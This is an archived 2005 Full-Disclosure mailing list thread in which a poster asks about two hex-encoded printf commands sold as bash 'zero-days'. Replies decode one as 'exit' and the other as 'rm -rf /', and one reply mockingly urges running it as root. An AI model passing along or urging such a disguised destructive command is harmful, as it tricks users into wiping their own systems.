lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Fri Aug 26 20:05:33 2005
From: octetstream at gmail.com (Octal)
Subject: Re: Bash vulnerability?

Please leave etard.  Actually, before you remove yourself from the
list you should probably run `printf
"\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"` as root on your own
system.

On 8/26/05, Gilles DEMARTY <gilles.demarty@...il.com> wrote:
> Hi, themaster ,
> 
> \x65\x78\x69\x74\ means exit (considering ASCII representation of letters) ....
> and `printf "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"` does a rm -rf / ......
> that's just a trick for people who don't know damn nothing about
> computer, and bash...
> it's even not worth replying this.
> 
> .......
> no more comments
> 
> 2005/8/26, Rootmaster G <th3r007m45t3r@...mail.com>:
> > I have for long time  been looking at a new bash zreod4y  that was sent to
> > me.  Having not time to calculate who this code works,and now it is with
> > this list
> >
> > I have many times made bash to crash but cannot yet wrige and exploit for
> > this issue.
> >
> > `printf "\x65\x78\x69\x74\x00\x0a"`
> >
> > aslo I have found this other bash zerod4y from the same place that says
> >
> > `printf "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"`
> >
> > both these vulnerabiilities must be run as root i find orf the second one
> > will not do what it thinks
> >
> > can anyone help?
> >
> > _________________________________________________________________
> > Express yourself instantly with MSN Messenger! Download today - it's FREE!
> > http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 


-- 
.: Eat Me

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ